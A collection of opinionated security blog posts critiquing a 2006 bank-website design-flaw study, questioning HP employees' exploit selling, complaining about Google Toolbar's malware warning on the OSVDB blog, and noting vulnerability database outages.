After being provided a link to the original paper and reading additional comments, I wanted to follow-up to my original post with more thoughts. If you want the slightly more technical review, search down to “methodology review”. The paper in question is “Analyzing Websites for User-Visible Security Design Flaws” by Laura Falk, Atul Prakash and Kevin Borders. I strongly encourage more security professionals to provide peer scrutiny to security research coming from universities.

As was pointed out, the research was done in 2006 (testing in Nov/Dec) but the results are just now being published. Three people working on a study on 214 web sites should not take that long to publish. To wait so long in publishing research on a topic like this, one must question if it is responsible, or more to the point, relevant. In the world of high end custom banking applications, my experience consulting for such companies tells me that many will do periodic audits from third parties and that these sites get continuous improvements and changes every week. One of the web sites I use for personal banking has changed dramatically in the last 12 months, making huge changes to the functionality and presumably architecture, security and design. The results of a 2006 audit of that site are probably most irrelevant.

As with most research papers, the lack of publish date in the header is annoying. The abstract does not mention the 2006 to 2008 time gap between research and publication either. This time difference is seen almost immediately in the citation of Schechter et al, regarding people “disregarding SSL indicators”. The current releases of several browsers, most notably IE7 and Firefox 3 make pretty big shifts in how the browser handles and warns about SSL indicators. Each browser is considerably more paranoid and will throw a warning over more discrepencies that each would have ignored in previous versions.

On page 1, Prakash et al list the criteria for the categories of “design flaws” they examined. As expected and mentioned in my previous post, the design flaws they examined are not necessarily a vulnerability, and often times do not put customer data at risk or they require additional requisites to be exploitable. To look at one of their design flaws as an example, consider the following:

Presenting secure login options on insecure pages: Some sites present login forms that forward to a secure page but do not come from a secure page. This is problematic because an attacker could modify the insecure page to submit login credentials to an insecure destination.

This summary of a design flaw is problematic in that it makes several assumptions and/or does not fully qualify the attack vector. First, to “modify” an insecure page being served from the bank to the user’s client (browser), the attacker would have to compromise the server (making this attack moot) or conduct a Man-in-The-Middle (MiTM) attack. I assume the latter is meant since the implication is that an attacker could not effectively MiTM attack a page wrapped in encryption (SSL).

It is interesting that the lack of SSL encryption is chosen as a design flaw with the notion that manipulation of an insecure page is the preferred attack vector. Such an attack is considerably more difficult to conduct compared to other threats (e.g. SQL Injection, Privilege Escalation) and would essentially target a single customers. Many large applications serving hundreds of thousands of users makes this trade-off of mixed security pages for performance reasons, as the overhead of encrypting all traffic can be costly.

Later in the paper when the team attempts to better define this design weakness, they say:

Consider the case where the customer service contact information for resetting passwords is provided on an insecure page. To compromise the system, an attacker only needs to spoof or modify the page, replacing the customer service phone numbers with bogus numbers.

Web pages can be spoofed regardless of the transport, so the presence of SSL encryption means little to nothing. If his team is implying an attacker “only need [..] modify the page”, that would require compromising the server or performing a MiTM attack. Again, this is not a trivial attack by any means and in the latter, would affect one customer.

While this is only one of five design flaws Prakash’s team looked for, consider the third example which is the exact same design weakness:

Contact information/security advice on insecure pages: Some sites host their security recommendations, contact information, and various other sensitive information about their site and company on insecure pages. This is dangerous because an attacker could forge the insecure page and present different recommendations and contact information.

This is the exact same issue as #2 in the list but just makes the specification of the content on the page. Factor in that issue #1 will be more prevalent in large organizations but a non-issue in smaller ones and the criteria of five design weaknesses gets cut down from five to four, with one that is likely not to be seen on some of the sites tested at all.

The paper quickly summarizes their findings before going in detail, before concluding “Overall, only 24% of the sites were completely free of these design flaws, indicating that some of the flaws we identified are not widely understood, even among institutions where security is critical.” This assumption and conclusion is dangerous and irresponsible. The implication that the presence of one or more of these flaws is indicative of the site not understanding the threat is presumptious. With the example given above about the high overhead of encrypting all content, some of the “design flaws” may be business decisions and acceptable risk.

Prakash et al begin to demonstrate their lack of understanding of client-server relationships and the transport mechanism for different protocols. The following paragraph from page 2 immediately calls his team’s technical competence:

One of the most interesting design flaws we discovered is the presentation of FAQs and contact information on insecure pages. In the past, FAQs and contact information were usually sent through the mail to the customer. It is not generally recognized that this information should be protected. However, when this information is presented online, the user becomes vulnerable to socialengineering and offline attacks as a result of the information being displayed on an insecure page.

Prakash’s contention that unencrypted content delivered from a web server to a browser is somehow different than when unencrypted content is delivered from a mail server to a mail reader is silly. If an attacker has the ability to MiTM attack a person, it isn’t going to be limited to HTTP. Sending that contact information via mail will result in a user deleting it or maybe storing it in a folder. The first time the person needs to contact the bank, they would check the web page for the contact information. If said information is not available, it now further burdens the bank as they may call a generic number and get transferred around several times. This adds to customer frustration and causes bank employees to spend extra time dealing with a customer that could have called the correct number to begin with.

Prakash’s team goes on to make more assumptions or not fully understand the importance of how web clients behave. Without getting into a full discussion on the philosophy of e-commerce sites adding mechanisms to invalidate client-side vulnerabilities, the general notion that it should be done if feasible seems reasonable. In this context, feasible means that it doesn’t overly burden the bank web site, does not impact performance and is generally transparent to the end user. One example of this is a Cross-frame spoofing issue that made it trivial for an attacker to use a phishing attack to MiTM attack MSIE 6 users. Web sites can add a small bit of javascript to help ensure that browsers load their pages in a new frame and essentially mitigates this risk. This is a good example of how many banks were helping protect customers, even though the vulnerability was in the customer’s software, not the bank web site. Prakash’s team claims:

Our work is similar in that some of the flaws that we consider impair a user’s ability to make correct security decisions. However, our work differs in that the cause is not poor or confusing client-side interfaces. Instead, the flaws originate in poor design or policy choices at the server that prevent or make it difficult for users to make correct choices from the perspective of securing their transactions.

While a mismatched SSL certificate used to be virtually ignored in some cases, new versions of popular browsers now behave differently in how they alert users, giving them the ability to more easily make correct choices. Claiming that this research is not impacted by “poor or confusing client-side interfaces” is misleading. While the older browsers were not necessarily confusing, they handled some situations regarding establishing trust poorly.

The next area of technology Prakash’s team doesn’t seem to fully understand is vulnerability scanners. In the paper his team says:

Network scanners, such as Nessus [11], and application-level website scanners, such as AppScan [17], can be used to analyze for many configuration and implementation bugs, such as use of unpatched services and vulnerability to cross-side scripting or SQLinjection attacks. As far as we are aware, the design flaws that we examine are currently not identified by these scanners.

Both Nessus and AppScan will identify several vulnerabilities that directly relate to the design flaws outlined. Both will give warning over invalid or expired SSL certificates, AppScan will warn about mixed-mode security pages and neither will perform tests for some of the design flaws listed (#3, #4, #5) because no scanner in the world can do it.

Methodology Review:

On page 8 (of 10), the team gives very brief descriptions of their testing methodology. The lack of description or their testing methodology undermines significant portions of the research. For “Break in the Chain of Trust”, the paper says “Under no circumstance should an insecure page make a transition to a securitysensitive website hosted on another domain, regardless of whether the destination site uses SSL.” This is an arbitrary ‘rule’ that is not widely accepted by anyone including the banking industry. Many web pages are designed to act as portals that link to additional features. The ‘rule’ as quotes from the paper would force large bank organizations to consolidate all web resources on a single domain. While that may be nice, it simply isn’t feasible to many businesses, especially ones with a large organization that includes multiple companies. Linking from http://bigbank.com/ to https://regionalbank.com/ is perfectly acceptable and should use proper SSL certificates and technology controls to help ensure the user ends up on the correct page, loaded directly by the browser.

The second design weakness studied was “Presenting Secure Login Options on Insecure Pages”. The paper explains their methodology as “.. searched each web page for the string “login”. If the string was found, we searched the same page for the strings “username” or “user id” or “password”. If the string .login. and .username. or .user id. or .password. were found on the same page, we then verified whether the page was displayed using the HTTP protocol. If this was the case, we assumed this site contained the design flaw.” The key word here being ‘assumed’. There are scenarios where the above methodology could easily generate a false positive. Even back in 2006, there were trivial ways to more easily determine the use of HTTPS with certainty.

The third design weakness studied was “Contact Information/Security Advice on Insecure Pages” and is perhaps the most technically lacking testing method one could perform:

We searched each web page for the string “contact”, “information”, or “FAQ”. If those strings where found, we checked whether the page was protected with SSL. If not, then we considered it to contain the design flaw.

The mere presence of these words on a site do not mean they are in the context of listing bank contact information. While ‘contact’ will frequently link to a ‘contact us’ page, looking for ‘information’ or ‘FAQ’ is absurd.

In the fourth weakness, “Inadequate Policies for User IDs and Passwords”, the team openly admits that their methodology may produce “optimistic” results and that they had no way to verify their results “without generating an account on the website”. Heaven forbid they find a couple hundred students at the university to participate by logging into their personal banks and checking this in more detail. That extra effort would have made this portion the only positive and accurate test. From the paper:

Our count could be optimistic; some sites may require strong passwords without stating an explicit policy. We had no obvious means of verifying this without generating an account on the website. Our count could also be conservative for sites that have poor policies resulting in weak passwords. Thus, our results for this design flaw should only be taken as a rough estimate of the extent of this particular problem.

As before, the fifth design weakness was extrapolated using a glorified ‘grep’ of the web page, analyzing proximity of a few keywords and then verifying the hits above an 85% threshold. And as before, this testing methodology makes huge assumptions about the wording on the page, does not positively account for HTML formatting that would impact the ‘distance’ between words (especially in pages with frames) and does not begin to test the functionality (see page 9, section 4.5).

Finally, the paper attempts to interpret the results of this poorly conceived and improperly tested study. Table 1 on page 10 says that 30% of the sites tested were affected by “Break in the chain of trust” but gets contradicted (clarified) in the first paragraph of the results:

With automated tools, such as the one used in our study, false positives are possible. To the extent feasible, we manually examined the results to eliminate false positives from the reported data. Our break-in-chain-of-trust data had a significant number false positives. Our automated tool reported about 30% of the websites to potentially use third-party sites in an unsafe way, but only 17% were found to do so without giving some sort of notification to the user about that transition.

Having such an admittedly large margin of error on the results based on their own methodology should be an eye-opener in regards to the integrity and accuracy of the results. Despite this revelation, the next paragraph immediately cites the table with the 30% number and begins to make conclusions based on the bogus numbers. They go on to further explain their primary tool for gathering information (the wget tool) may not have retrieved all of the information needed to properly assess the site.

Despite the weak methodology, 44% error rate on at least one test and admitted errors, Prakash et al go on to say “We found that 76% of sites have at least one design flaw.” Such statements are certainly not factual or even statistically correct based on the research presented.


Prakash followed up with a brief reply that was dismissive of my write-up, and only called for more research of bank sites. What he failed to understand is that more research of this nature, with huge gaps and a lack of understanding of the subject matter, will only produce more statistics and articles that have no relevance or meaning in our industry. Worse, they serve to provide inaccurate information that could only be used as a basis for poor decisions for people with an interest in information security.

The Black Market Code Industry

[This was originally published on the OSVDB blog.]

Adam Penenberg wrote an article titled “The Black Market Code Industry” for FastCompany in which he details his research of two HP employees that actively sold exploit code in their spare time, at least one selling exploits in HP’s own software. According to the article, HP knew about one of the employees at the time of the article and were investigating. While a neat article and fun read, it left me with a lot more questions that I hope get answered at some point (how about a ‘Part 2’ Adam?).

  1. Does Rigano still work for HP now that the article has been out a week?
  2. Did either individual have access to source code to make their exploit writing easier? If so, did they have access to edit source code in any capacity (e.g. backdoors, adding vulnerable code)?
  3. Did Rigano actually sell his exploits? If so, to who and for how much? Checking the Full-Disclosure list archives, he appears to have had exploits for IIS 6.0, Firefox 2.x, MSIE 7, SAP, Apache, Microsoft Office and more.
  4. If Rigano did sell vulnerabilities, did he vet his buyers or could he have sold them to ‘enemy’ nations or hostile countries (relative I know)?
  5. Why is the FBI investigating a France based employee of HP?
  6. Is t0t0 a current employee of HP? If not, did he leave for his exploit selling activities? The article suggests that HP is aware of one of the two sellers. What do they have to say about this article now?

Stop Using Google, It’s Dangerous!

[This was originally published on the OSVDB blog.]

Reported Phishing/Vulnerable Site! The web site http://www.google.com has been reported as a vulnerable site that may pose a threat to your web browsing. Vulnerable sites do not prioritize security and don’t care about their users and customers. These sites may pose a risk to you, exploit the trust between you and their site and may cause your computer to perform actions you did not approve.

To carry on the scary wording in the style of others; Some web sites are high profile and may seem trustworthy, but you shouldn’t trust them at all. They are full of buggy code, don’t care about protecting their users (that’s you!) and generally suck. Despite using their site as a virtual crutch, you should clearly stay away from them unless it is to send nasty mails or mock them. Again, do not trust Google’s web sites or search engine, because they have been known to be vulnerable. What assholes!

On a more serious note, if anyone at Google is reading this, I hope you pass this on to the jackasses that develop Google Toolbar or whatever hook they use to integrate with Firefox. Not only is it worse than malware (every piece of software tries to get me to install it), it uses misleading wording to scare customers from visiting perfectly safe and innocent web sites (namely this blog). While it caters to morons, it doesn’t give users a real opportunity to learn why a site was ‘blocked’ other than vague wording in the diagnostic page:

My only guess as to why this warning occurs was an incident earlier this year, in which the OSVDB blog fell victim to a zero-day exploit in WordPress. I blogged about the incident to make our readers aware of the incident and clear up any confusion. I assume that Google’s crawl of the this blog noted the script code and subsequently declared us an “attack site”, even though that is hardly the case.

The discouraging part is the “diagnostic page” says that Google visited ONE page in the last 90 days and 0 of those pages resulted in malicious software being downloaded. Google, if you are going to play Lord of the Browser, visit more than one page before you make that determination. To do anything less is a disservice to your users and a fast way to miss obvious malware. The third question mentions “intermediary” which is technically accurate as far as the script code that was injected in a few blog posts. However, the big red warning says nothing about ‘intermediary’ and explicitly labels us as some kind of malware hosting site with the intent of attacking people. That is libelous to say the least. Under ‘How did this happen’, Google mentions that sometimes third parties can inject such code, but doesn’t take the time to help clear this up. If the previous script injection issue is the cause of this, the fact that the script loaded content from a third party domain (in China no less) should be a good indication that WE did not host the malware. Sure, most users are dumb as a rock, but the few smart cookies that click for details should get just that.. details.

What Google Toolbar users may see when visiting this blog:

Finally, I opened the blog post calling Google’s search engine a threat, and I was serious. Google has a track record of vulnerabilities far worse than OSVDB does. Not only in their popular search engine, but their various products too. Besides, the mechanism for reporting potentially dangerous sites is a bit dubious to say the least.

Update: Ends up, we had another iframe injection into one of our posts (which is now removed), and the hunt for how this is happening now begins. That said, while Google’s warning that this site is “dangerous” may have been accurate, their mechanism for warning users in a vague manner (as shown in the image linked off ‘vague warning’) and not warning the site administrator is far from friendly. I can see that Google doesn’t care about warning sites of issues before warning the public, a far cry from ‘responsible disclosure’, something that Google pretends to care about:

This process of notifying a vendor before publicly releasing information is an industry-standard best practice known as responsible disclosure. Responsible disclosure is important to the ecology of the Internet. It allows companies like Google to keep users safe by fixing vulnerabilities and resolving security concerns before they are brought to the attention of the bad guys. We strongly encourage anyone who is interested in researching and reporting security issues to observe the simple courtesies and protocols of responsible disclosure.

Next time OSVDB is informed of a vulnerability that impacts Google products or services, I sure hope it doesn’t slip our mind to contact them. Perhaps the apparent race condition between the vague wording and the not-so-vague wording (below) that users may see constitutes a bug. If they can read this blog, they can see the bug in action and then contact us if they have more questions.

Update 2: Google apparently tried to send mail to our domain: From: Google Search Quality

VDBs Devolving?

[This was originally published on the OSVDB blog.]

I’m big on Vulnerability Database (VDB) evolution. I tend to harp on them for not adding features, not making the data more accessible and generally doing the exact same thing they did ten years ago. While the target of my ire is typically functionality or usability, today it is about a little more.

Last night I wanted to check for details on a CVE entry that was rather vague and had a single reference to BID. This is fairly common in the VDB world as one database will add an entry and not provide a link to the source of the data (Secunia and BID primarily). As luck would have it, BID was down. Almost twelve hours later and their VDB is still down. What annoys me is that while they aren’t delivering vulnerability information, they sure are delivering advertisements. Why can’t VDBs get the same dedication and resources that ad farms get?

Next, I wanted to find out if the other VDBs created an entry for the latest OpenBSD flap yet, so I went to X-force which is a pretty reliable database. Much to my dismay, it appears that the ‘advanced’ search is now gone. While it wasn’t extremely powerful, it let you do some basic sorting that was immensely helpful in finding what you need. I have mail out to them asking for confirmation that it is indeed gone versus a web geek error. I certainly hope it is the latter…

Update: Over 24 hours later, the BID database is finally available again. ISS has not replied to at least two mails from VDB managers asking about the missing advanced search feature.